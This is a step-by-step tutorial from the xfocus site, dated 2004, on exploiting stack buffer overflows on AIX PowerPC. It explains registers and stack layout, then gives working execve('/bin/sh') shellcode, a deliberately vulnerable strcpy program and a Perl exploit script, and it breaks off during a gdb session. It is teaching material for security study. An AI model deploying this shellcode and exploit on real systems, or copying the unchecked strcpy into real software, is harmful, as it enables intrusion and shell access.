xfocus logo xfocus title
welcome documents programs exploits advisories forums
Chinese Version

AIX PowerPC buffer overflow step by step


Create: 2004-08-13
Author: san (san_at_xfocus.org)

Chinese version: http://www.xfocus.net/articles/200406/711.html

--[ 1 - Familiar with PowerPC architecture(32 bit)

The PowerPC architecture is a Reduced Instruction Set Computer (RISC) architecture, with over two hundred defined instructions. PowerPC is RISC in that most instructions execute in a single cycle and typically perform a single operation (such as loading storage to a register, or storing a register to memory). PowerPC instructions are of uniform length of 32 bits and there are almost 12 instruction formats, which reflect 5 primary classes of instructions:

- branch instructions,
- fixed-point instructions,
- floating-point instructions,
- load and store instructions,
- processor control instructions.

PowerPC's application-level registers are broken into three classes: general-purpose registers (GPRs), floating-point registers (FPRs and Floating-Point Status and Control Register [FPSCR]), and special-purpose registers (SPRs). We can see 38 registers in gdb with "info registers" command. Following, Let's look at each class.

r0        Volatile register used in function prologs
r1        Stack frame pointer
r2        TOC pointer
r3        Volatile parameter and return value register
r4-r10    Volatile registers used for function parameters
r11       Volatile register used in calls by pointer and as an
          environment pointer for languages which require one
r12       Volatile register used for exception handling and glink code
r13       Reserved for use as system thread ID
r14-r31   Nonvolatile registers used for local variables

Floating-point registers (FPRs)

f0        Volatile scratch register
f1-f4     Volatile floating point parameter and return value registers
f5-f13    Volatile floating point parameter registers
f14-f31   Nonvolatile registers

Special-purpose registers (SPRs)

LR        Link register (volatile)
CTR       Loop counter register (volatile)
XER       Fixed point exception register (volatile)
FPSCR     Floating point status and control register (volatile)

CR0-CR1   Volatile condition code register fields
CR2-CR4   Nonvolatile condition code register fields
CR5-CR7   Volatile condition code register fields

Registers r1, r14 through r31, and f14 through f31 are nonvolatile, which means that they preserve their values across function calls. Functions which use those registers must save the value before changing it, restoring it before the function returns. Register r2 is technically nonvolatile, but it is handled specially during function calls as described below: in some cases the calling function must restore its value after a function call.

Registers r0, r3 through r12, f0 through f13, and the special purpose registers LR, CTR, XER, and FPSCR are volatile, which means that they are not preserved across function calls. Furthermore, registers r0, r2, r11, and r12 may be modified by cross-module calls, so a function can not assume that the values of one of these registers is that placed there by the calling function.

The condition code register fields CR0, CR1, CR5, CR6, and CR7 are volatile. The condition code register fields CR2, CR3, and CR4 are nonvolatile; a function which modifies them must save and restore at least those fields of the CR. Languages that require "environment pointers" shall use r11 for that purpose.

On AIX the svca (sc in a mnemonic notation of PowerPC) instruction is used whenever the operating system services are to be called. The r2 register denotes the system call number and registers r3-r10 are appropriately filled with a given system call arguments. There are two additional prerequisites that must be fulfilled before executing the system call instruction: the LR register must be filled with the return from syscall address value and the crorc cr6, cr6, cr6 instruction must be issued just before the system call.

--[ 2 - Learn AIX PowerPC assemble format

Use gcc -S to compile C program can obtain AIX assembly code. If you are not familiar with AIX PowerPC assemble format, just write a small program in C language.

/* setuid.c
*
*  Learn AIX PowerPC assembly
*/
#include <unistd.h>
int main()
{
    setuid(0);
}

Then compile it use gcc with -S option:

-bash-2.05b$ gcc -S setuid.c

Open setuid.s on current directory:

        .file   "setuid.c"
        .toc
        .csect .text[PR]
        .align 2
        .globl main
        .globl .main
        .csect main[DS]
main:
        .long .main, TOC[tc0], 0
        .csect .text[PR]
.main:
        .extern __mulh
        .extern __mull
        .extern __divss
        .extern __divus
        .extern __quoss
        .extern __quous
        mflr 0
        stw 31,-4(1)
        stw 0,8(1)
        stwu 1,-72(1)
        mr 31,1
        li 3,0
        bl .setuid
        nop
        mr 3,0
        lwz 1,0(1)
        lwz 0,8(1)
        mtlr 0
        lwz 31,-4(1)
        blr
LT..main:
        .long 0
        .byte 0,0,32,97,128,1,0,1
        .long LT..main-.main
        .short 4
        .byte "main"
        .byte 31
        .align 2
_section_.text:
        .csect .data[RW],3
        .long _section_.text

To reduce to fundamental parts, the following is enough:

        .globl .main
        .csect .text[PR]
.main:
        mflr 0
        stw 31,-4(1)
        stw 0,8(1)
        stwu 1,-72(1)
        mr 31,1
        li 3,0
        bl .setuid
        nop
        mr 3,0
        lwz 1,0(1)
        lwz 0,8(1)
        mtlr 0
        lwz 31,-4(1)
        blr

--[ 3 - Learn shellcode of AIX PowerPC

B-r00t's PowerPC/OS X (Darwin) Shellcode Assembly is good stuff, although it is OS X but both are PowerPC architecture. We can write shellcode like B-r00t:

-bash-2.05b$ cat simple_execve.s
.globl .main
.csect .text[PR]
.main:
        xor.    %r5, %r5, %r5       # r5 = NULL
        bnel    .main               # branch to _main if not equal
        mflr    %r3                 # r3 = main + 8
        addi    %r3, %r3, 32        # r3 = main + 8 + 32 = string
        stw     %r3, -8(%r1)        # argv[0] = string
        stw     %r5, -4(%r1)        # argv[1] = NULL
        subi    %r4, %r1, 8         # r4 = pointer to argv[]
        li      %r2, 5              # syscall number = execve
        crorc   %cr6, %cr6, %cr6    # There are two additional prerequisites that must be fulfilled before executing the system call instruction: the LR register must be filled with the return from syscall address value and the crorc cr6, cr6, cr6 instruction must be issued just before the system call.
        svca    0                   # execve(r3, r4, r5)
string:                             # execve(path, argv[], NULL)
        .asciz  "/bin/sh"

-bash-2.05b$ gcc -o simple_execve simple_execve.s
-bash-2.05b$ ./simple_execve
$

The execve syscall executed correct, and then use objdump check the opcode:

-bash-2.05b$ objdump -d simple_execve|more
...
0000000010000544 <.main>:
    10000544:   7c a5 2a 79     xor.    r5,r5,r5
    10000548:   40 82 ff fd     bnel    10000544 <.main>
    1000054c:   7c 68 02 a6     mflr    r3
    10000550:   38 63 00 20     cal     r3,32(r3)
    10000554:   90 61 ff f8     st      r3,-8(r1)
    10000558:   90 a1 ff fc     st      r5,-4(r1)
    1000055c:   38 81 ff f8     cal     r4,-8(r1)
    10000560:   38 40 00 05     lil     r2,5
    10000564:   4c c6 33 42     crorc   6,6,6
    10000568:   44 00 00 02     svca    0
    1000056c:   2f 62 69 6e     cmpi    6,r2,26990
    10000570:   2f 73 68 00     cmpi    6,r19,26624
...

There are some opcodes contain zero. These bytes must be eliminated for the shellcode to suit strcpy etc. Some instructions have reservered bytes, so we can replace it. The opcode of svca is 0x44000002. However, bytes 2 and 3 of the opcode are reserved and therefore not used. So it can be instead of 0x44ffff02. LSD provided a simple shellcode:

/* shellcode.c
*
*  ripped from lsd
*/

char shellcode[] =         /* 12*4+8 bytes                 */
    "\x7c\xa5\x2a\x79"     /* xor.    r5,r5,r5             */
    "\x40\x82\xff\xfd"     /* bnel    <shellcode>          */
    "\x7f\xe8\x02\xa6"     /* mflr    r31                  */
    "\x3b\xff\x01\x20"     /* cal     r31,0x120(r31)       */
    "\x38\x7f\xff\x08"     /* cal     r3,-248(r31)         */
    "\x38\x9f\xff\x10"     /* cal     r4,-240(r31)         */
    "\x90\x7f\xff\x10"     /* st      r3,-240(r31)         */
    "\x90\xbf\xff\x14"     /* st      r5,-236(r31)         */
    "\x88\x5f\xff\x0f"     /* lbz     r2,-241(r31)         */
    "\x98\xbf\xff\x0f"     /* stb     r5,-241(r31)         */
    "\x4c\xc6\x33\x42"     /* crorc   cr6,cr6,cr6          */
    "\x44\xff\xff\x02"     /* svca                         */
    "/bin/sh"
    "\x05"
    ;
int main(void)
{
    int jump[2]={(int)shellcode,0};
    ((*(void (*)())jump)());
}

After compiled this program, use IDAPro to open and disassemble it. In IDAPro window, click shellcode at Names window and press c to disassemble the shellcode data:

.data:200006D8             shellcode:                              # CODE XREF: .data:200006DCp
.data:200006D8                                                     # DATA XREF: .data:shellcode_TCo
.data:200006D8 7C A5 2A 79                 xor.    r5, r5, r5      # r5 = NULL
.data:200006DC 40 82 FF FD                 bnel    shellcode       # branch to shellcode if not equal
.data:200006E0 7F E8 02 A6                 mflr    r31             # r31 = .data:200006D8 + 8
.data:200006E4 3B FF 01 20                 addi    r31, r31, 0x120 # r31 = .data:200006D8 + 8 + 0x120
.data:200006E8 38 7F FF 08                 subi    r3, r31, 0xF8   # r3  = .data:200006D8 + 8 + 0x120 - 0xF8 = .data:20000708 = string
.data:200006EC 38 9F FF 10                 subi    r4, r31, 0xF0   # r4  = .data:20000710
.data:200006F0 90 7F FF 10                 stw     r3, -0xF0(r31)  # put address .data:20000708 to .data:20000710
.data:200006F4 90 BF FF 14                 stw     r5, -0xEC(r31)  # put 0 to .data:20000714
.data:200006F8 88 5F FF 0F                 lbz     rtoc, -0xF1(r31)# load syscall number to r2
.data:200006FC 98 BF FF 0F                 stb     r5, -0xF1(r31)  # put 0 to .data:2000070F
.data:20000700 4C C6 33 42                 crorc   4*cr1+eq, 4*cr1+eq, 4*cr1+eq # Condition Register OR with Comlement
.data:20000700             # ------------------------------------------------------------------------
.data:20000704 44                          .byte 0x44 # modified svca
.data:20000705 FF                          .byte 0xFF
.data:20000706 FF                          .byte 0xFF
.data:20000707 02                          .byte    2
.data:20000708 2F                          .byte 0x2F # /
.data:20000709 62                          .byte 0x62 # b
.data:2000070A 69                          .byte 0x69 # i
.data:2000070B 6E                          .byte 0x6E # n
.data:2000070C 2F                          .byte 0x2F # /
.data:2000070D 73                          .byte 0x73 # s
.data:2000070E 68                          .byte 0x68 # h
.data:2000070F 05                          .byte    5

IDAPro is more powerful and it's disassembly is more understandability. OK, we know how to write and debug shellcode now.

--[ 4 - Learn overflow technology of AIX PowerPC

There are differences of stack structure between PowerPC and ia32. The PowerPC stack conventions use only a stack pointer (held in register GPR1) and no frame pointer. This configuration assumes a fixed stack frame size, which is known at compile time. Parameters are not passed by pushing them onto the stack. The following is the PowerPC stack:

       . Stack before   .               . Stack after    .
       .  calling a     .               .  calling a     .
       |  procedure     |               |  procedure     |
       +----------------+-              +----------------+-
       | Parameter area | |             | Parameter area | |
       +----------------+ +-Caller      +----------------+ +-Caller
       | Linkage area   | |             | Linkage area   | |
SP --->+----------------+-              +----------------+-
       |  Stack grows   |               | Saved registers| |
       .      down      .               +----------------+ |
       .        |       .               | Local variables| |
                v                       +----------------+ +-Callee
                                        | Parameter area | |
                                        +----------------+ |
                                        | Linkage area   | |
                                 SP --->+----------------+-
                                        |  Stack grows   |
                                        .      down      .
                                        .        |       .
                                                 v

The PowerPC runtime environment uses a grow-down stack that contains linkage information, local variables, and a routine's parameter information.

The calling routine's linkage area holds a number of values, some of which are saved by the calling routine and some by the called routine. It's structure as following:

    +24+----------------+
       |    Saved TOC   |
    +20+----------------+
       |    Reserved    |
    +16+----------------+
       |    Reserved    |
    +12+----------------+
       |    Saved LR    |
     +8+----------------+
       |    Saved CR    |
     +4+----------------+
       |    Saved SP    |
SP --->+----------------+

The Link Register (LR) value is saved at 8(SP) by the called routine if it chooses to do so.
The Condition Register (CR) value may be saved at 4(SP) by the called routine. As with the Link Register value, the called routine is not required to save this value.
The stack pointer is always saved by the calling routine as part of its stack frame.

The parameter area has space for the parameters of any routines the caller calls (not the parameters of the caller itself). Since the calling routine might call several different routines, the parameter area must be large enough to accommodate the largest parameter list of all the routines the caller calls. It is the calling routine's responsibility for setting up the parameter area before each call to some other routine, and the called routine's responsibility for accessing the parameters placed within it.

There are three instructions when function return on ia32:

mov esp,ebp ; esp point to prior frame
pop ebp
ret         ; execute address that saved at esp+4

There are some instructions when function return on AIX PowerPC:

lwz     r1,0(r1)    # r1 point to prior frame
lwz     r0,8(r1)    # load saved lr to r0
mtlr    r0          # lr=r0
lwz     r31,-4(r1)  #
blr                 # execute address that saved at lr

Although there are differences of stack structure between PowerPC and ia32, but they have the same overflow technology. We need overwrite ebp+4 of current frame to return our control address on ia32, and we need overwrite r1+8 of prior frame to return our control address on AIX PowerPC.

Running the simple_overflow program in GDB shows that the control of the saved return address (previous LR value) is possible.

-bash-2.05b$ cat simple_overflow.c
/* simple_overflow.c
*
*  Simple program to demonstrate buffer overflows
*  on the PowerPC architecture.
*/
#include <stdio.h>
#include <string.h>
char largebuff[] =
"123451234512345123451234=PRESERVEDSPACE=ABCD";
int main (void)
{
    char smallbuff[16];
    strcpy (smallbuff, largebuff);
}

-bash-2.05b$ gcc -o simple_overflow simple_overflow.c
-bash-2.05b$ gdb -q simple_overflow
(gdb) r
Starting program: /home/san/simple_overflow

Program received signal SIGSEGV, Segmentation fault.
0x41424344 in ?? ()
(gdb) i reg
r0             0x41424344       1094861636
r1             0x2ff22bb0       804400048
r2             0x20000e70       536874608
r3             0x20     32
r4             0x20000534       536872244
r5             0x2ff22bbc       804400060
r6             0x0      0
r7             0x0      0
r8             0x0      0
r9             0x80808080       -2139062144
r10            0x7f7f7f7f       2139062143
r11            0x4      4
r12            0x80808080       -2139062144
r13            0xdeadbeef       -559038737
r14            0x1      1
r15            0x2ff22c00       804400128
r16            0x2ff22c08       804400136
r17            0x0      0
r18            0xdeadbeef       -559038737
r19            0xdeadbeef       -559038737
r20            0xdeadbeef       -559038737
r21            0xdeadbeef       -559038737
r22            0xdeadbeef       -559038737
r23            0xdeadbeef       -559038737
r24            0xdeadbeef       -559038737
r25            0xdeadbeef       -559038737
r26            0xdeadbeef       -559038737
r27            0xdeadbeef       -559038737
r28            0x20000460       536872032
r29            0x10000000       268435456
r30            0x3      3
r31            0x53455256       1397051990
pc             0x41424344       1094861636
ps             0x4000d032       1073795122
cr             0x22222842       572663874
lr             0x41424344       1094861636
ctr            0x4      4
xer            0x0      0
fpscr          0x0      0
vscr           0x0      0
vrsave         0x0      0
(gdb) x/8x $r1
0x2ff22bb0:     0x45445350      0x4143453d      0x41424344      0x00000000
0x2ff22bc0:     0x00000000      0x20000e70      0x00000000      0x00000000

Register pc has been overwritten to ABCD and this is our controled content.

(gdb) disas main
Dump of assembler code for function main:
0x1000054c <main+0>:    mflr    r0
0x10000550 <main+4>:    stw     r31,-4(r1)
0x10000554 <main+8>:    stw     r0,8(r1)
0x10000558 <main+12>:   stwu    r1,-88(r1)
0x1000055c <main+16>:   mr      r31,r1
0x10000560 <main+20>:   addi    r3,r31,56
0x10000564 <main+24>:   lwz     r4,80(r2)
0x10000568 <main+28>:   bl      0x10006fa0 <strcpy>
0x1000056c <main+32>:   nop
0x10000570 <main+36>:   mr      r3,r0
0x10000574 <main+40>:   lwz     r1,0(r1)
0x10000578 <main+44>:   lwz     r0,8(r1)
0x1000057c <main+48>:   mtlr    r0
0x10000580 <main+52>:   lwz     r31,-4(r1)
0x10000584 <main+56>:   blr
0x10000588 <main+60>:   .long 0x0
0x1000058c <main+64>:   .long 0x2061
0x10000590 <main+68>:   lwz     r0,1(r1)
0x10000594 <main+72>:   .long 0x3c
0x10000598 <main+76>:   .long 0x46d61
0x1000059c <main+80>:   xori    r14,r11,7936
End of assembler dump.
(gdb) b main
Breakpoint 1 at 0x10000560
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/san/simple_overflow

Breakpoint 1, 0x10000560 in main ()
(gdb) display/i $pc
1: x/i $pc  0x10000560 <main+20>:       addi    r3,r31,56
(gdb) x/20x $r1
0x2ff22b58:     0x2ff22bb0      0x00000000      0x00000000      0x00000000
0x2ff22b68:     0x00000000      0x00000000      0x00000000      0x00000000
0x2ff22b78:     0x00000000      0x00000000      0x00000000      0x00000001
0x2ff22b88:     0x00000000      0xdeadbeef      0xdeadbeef      0xdeadbeef
0x2ff22b98:     0xdeadbeef      0xdeadbeef      0x20000460      0x10000000
(gdb)
0x2ff22ba8:     0x00000003      0x20000460      0x00000000      0x44222802
0x2ff22bb8:     0x100001cc      0x00000000      0x00000000      0x20000e70
0x2ff22bc8:     0x00000000      0x00000000      0x00000000      0x00000000
0x2ff22bd8:     0x00000000      0x00000000      0x00000000      0x00000000
0x2ff22be8:     0x00000000      0x00000000      0x00000000      0x00000000

0x2ff22b58 is the current sp, and it contains prior stack frame address(0x2ff22bb0). So we can get the lr value that saved in prior stack frame, and it is 0x100001cc. The program will execute this address after main function return.

(gdb) until *0x1000056c
0x1000056c in main ()
1: x/i $pc  0x1000056c <main+32>:       nop
(gdb) i reg
r0             0x20     32
r1             0x2ff22b58       804399960
r2             0x20000e70       536874608
r3             0x2ff22b90       804400016
r4             0x20000534       536872244
r5             0x2ff22bbc       804400060
r6             0x0      0
r7             0x0      0
r8             0x0      0
r9             0x80808080       -2139062144
r10            0x7f7f7f7f       2139062143
r11            0x4      4
r12            0x80808080       -2139062144
r13            0xdeadbeef       -559038737
r14            0x1      1
r15            0x2ff22c00       804400128
r16            0x2ff22c08       804400136
r17            0x0      0
r18            0xdeadbeef       -559038737
r19            0xdeadbeef       -559038737
r20            0xdeadbeef       -559038737
r21            0xdeadbeef       -559038737
r22            0xdeadbeef       -559038737
r23            0xdeadbeef       -559038737
r24            0xdeadbeef       -559038737
r25            0xdeadbeef       -559038737
r26            0xdeadbeef       -559038737
r27            0xdeadbeef       -559038737
r28            0x20000460       536872032
r29            0x10000000       268435456
r30            0x3      3
r31            0x2ff22b58       804399960
pc             0x1000056c       268436844
ps             0x2d032  184370
cr             0x22222842       572663874
lr             0x1000056c       268436844
ctr            0x4      4
xer            0x0      0
fpscr          0x0      0
vscr           0x0      0
vrsave         0x0      0
(gdb) x/20x $r1
0x2ff22b58:     0x2ff22bb0      0x00000000      0x00000000      0x00000000
0x2ff22b68:     0x00000000      0x00000000      0x00000000      0x00000000
0x2ff22b78:     0x00000000      0x00000000      0x00000000      0x00000001
0x2ff22b88:     0x00000000      0xdeadbeef      0x31323334      0x35313233
0x2ff22b98:     0x34353132      0x33343531      0x32333435      0x31323334
(gdb)
0x2ff22ba8:     0x3d505245      0x53455256      0x45445350      0x4143453d
0x2ff22bb8:     0x41424344      0x00000000      0x00000000      0x20000e70
0x2ff22bc8:     0x00000000      0x00000000      0x00000000      0x00000000
0x2ff22bd8:     0x00000000      0x00000000      0x00000000      0x00000000
0x2ff22be8:     0x00000000      0x00000000      0x00000000      0x00000000

After strcpy, the lr value that saved in prior stack frame was overwritten to 0x41424344.

(gdb) ni
0x10000570 in main ()
1: x/i $pc  0x10000570 <main+36>:       mr      r3,r0
(gdb)
0x10000574 in main ()
1: x/i $pc  0x10000574 <main+40>:       lwz     r1,0(r1)
(gdb)
0x10000578 in main ()
1: x/i $pc  0x10000578 <main+44>:       lwz     r0,8(r1)
(gdb)
0x1000057c in main ()
1: x/i $pc  0x1000057c <main+48>:       mtlr    r0
(gdb)
0x10000580 in main ()
1: x/i $pc  0x10000580 <main+52>:       lwz     r31,-4(r1)
(gdb)
0x10000584 in main ()
1: x/i $pc  0x10000584 <main+56>:       blr
(gdb)

Program received signal SIGSEGV, Segmentation fault.
0x41424344 in ?? ()
1: x/i $pc  0x41424344: Cannot access memory at address 0x41424344
Disabling display 1 to avoid infinite recursion.

These instructions has been introduced before. The program will execute the lr value that saved in prior stack frame at r1+8.

--[ 5 - How to attack overflow vulnerability on AIX PowerPC

Now we know overflow process, then let's try to attack overflow vulnerability. The following program is the vulnerability.

-bash-2.05b$ cat vulnerable.c
/* vulnerable.c
*
*  Vulnerable program on the PowerPC architecture.
*/

#include <stdio.h>
#include <string.h>
int main (int argc, char *argv[])
{
    char vulnbuff[16];
    strcpy (vulnbuff, argv[1]);
    printf ("\n%s\n", vulnbuff);
    getchar(); /* for debug */
}

-bash-2.05b$ gcc -o vulnerable vulnerable.c

0x2ff22fff seems to be stack bottom of AIX. The following is the AIX's stack structure:

           Stack bottom
       +----------------+ 0x2ff22fff
       |    Reserverd   |
       +----------------+
       |    Enviroment  |
       +----------------+
       |      args      |
       +----------------+
       |      path      |
       +----------------+
       |  Stack frames  |
SP --->+----------------+
       |  Stack grows   |
       .      down      .
       .        |       .
       .        v       .

Enviroment address can be guessed more exactly, so we put lots of nop instructions and the shellcode into the enviroment.

-bash-2.05b$ cat exploit.pl
#!/usr/bin/perl
#
# exploit.pl
# exploit program vulnerable

$CMD="/home/san/vulnerable";

$SHELLCODE=
    "\x7c\xa5\x2a\x79".     # /* xor.    r5,r5,r5             */
    "\x40\x82\xff\xfd".     # /* bnel    <shellcode>          */
    "\x7f\xe8\x02\xa6".     # /* mflr    r31                  */
    "\x3b\xff\x01\x20".     # /* cal     r31,0x120(r31)       */
    "\x38\x7f\xff\x08".     # /* cal     r3,-248(r31)         */
    "\x38\x9f\xff\x10".     # /* cal     r4,-240(r31)         */
    "\x90\x7f\xff\x10".     # /* st      r3,-240(r31)         */
    "\x90\xbf\xff\x14".     # /* st      r5,-236(r31)         */
    "\x88\x5f\xff\x0f".     # /* lbz     r2,-241(r31)         */
    "\x98\xbf\xff\x0f".     # /* stb     r5,-241(r31)         */
    "\x4c\xc6\x33\x42".     # /* crorc   cr6,cr6,cr6          */
    "\x44\xff\xff\x02".     # /* svca                         */
    "/bin/sh".
    "\x05";

$NOP="\x60\x60\x60\x60"x800;
%ENV=();

$ENV{CCC}=$NOP.$SHELLCODE;
$ret=system $CMD ,"\x2f\xf2\x2b\x40"x11;

Try it.

-bash-2.05b$ ./exploit.pl

/?+@/?+@/?+@/?+@/?+@/?+@/?+@/?+@/?+@

Use gdb debug the vulnerable program on the another tty:

-bash-2.05b$ ps aux|grep vul
san      47644  0.0  0.0  208  220  pts/1 A    22:16:24  0:00 grep vul
san      44544  0.0  0.0   96  304  pts/0 A    22:16:02  0:00 /home/san/vulnera
-bash-2.05b$ gdb vulnerable 44544
GNU gdb 6.1
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "powerpc-ibm-aix5.1.0.0"...
Attaching to program: /home/san/vulnerable, process 44544
0xd01ea254 in read () from /usr/lib/libc.a(shr.o)
(gdb) disas main
Dump of assembler code for function main:
0x10000544 <main+0>:    mflr    r0
0x10000548 <main+4>:    stw     r31,-4(r1)
0x1000054c <main+8>:    stw     r0,8(r1)
0x10000550 <main+12>:   stwu    r1,-88(r1)
0x10000554 <main+16>:   mr      r31,r1
0x10000558 <main+20>:   stw     r3,112(r31)
0x1000055c <main+24>:   stw     r4,116(r31)
0x10000560 <main+28>:   lwz     r9,116(r31)
0x10000564 <main+32>:   addi    r9,r9,4
0x10000568 <main+36>:   addi    r3,r31,56
0x1000056c <main+40>:   lwz     r4,0(r9)
0x10000570 <main+44>:   bl      0x10007000 <strcpy>
0x10000574 <main+48>:   nop
0x10000578 <main+52>:   lwz     r3,88(r2)
0x1000057c <main+56>:   addi    r4,r31,56
0x10000580 <main+60>:   bl      0x100073ec <printf>
0x10000584 <main+64>:   lwz     r2,20(r1)
0x10000588 <main+68>:   lwz     r11,92(r2)
0x1000058c <main+72>:   lwz     r9,92(r2)
0x10000590 <main+76>:   lwz     r9,4(r9)
0x10000594 <main+80>:   addi    r0,r9,-1
0x10000598 <main+84>:   stw     r0,4(r11)
0x1000059c <main+88>:   cmpwi   r0,0
0x100005a0 <main+92>:   bge-    0x100005b4 <main+112>
0x100005a4 <main+96>:   lwz     r3,92(r2)
0x100005a8 <main+100>:  bl      0x1000747c <__filbuf>
0x100005ac <main+104>:  lwz     r2,20(r1)
0x100005b0 <main+108>:  b       0x100005c8 <main+132>
0x100005b4 <main+112>:  lwz     r11,92(r2)
0x100005b8 <main+116>:  lwz     r9,92(r2)
0x100005bc <main+120>:  lwz     r9,0(r9)
0x100005c0 <main+124>:  addi    r0,r9,1
0x100005c4 <main+128>:  stw     r0,0(r11)
0x100005c8 <main+132>:  mr      r3,r0
0x100005cc <main+136>:  lwz     r1,0(r1)
0x100005d0 <main+140>:  lwz     r0,8(r1)
0x100005d4 <main+144>:  mtlr    r0
0x100005d8 <main+148>:  lwz     r31,-4(r1)
0x100005dc <main+152>:  blr
0x100005e0 <main+156>:  .long 0x0
0x100005e4 <main+160>:  .long 0x2061
0x100005e8 <main+164>:  lwz     r0,513(r1)
---Type <return> to continue, or q <return> to quit---
0x100005ec <main+168>:  .long 0x0
0x100005f0 <main+172>:  .long 0x9c
0x100005f4 <main+176>:  .long 0x46d61
0x100005f8 <main+180>:  xori    r14,r11,7936
End of assembler dump.
(gdb) b *0x100005dc
Breakpoint 1 at 0x100005dc
(gdb) c
Continuing.

Press any key at the tty which running exploit.pl, and the gdb debug window continues:

Breakpoint 1, 0x100005dc in main ()
(gdb) i reg
r0             0x100001cc       268435916
r1             0x2ff22210       804397584
r2             0x20000ee8       536874728
r3             0xf00890f1       -267874063
r4             0xf00890f0       -267874064
r5             0x0      0
r6             0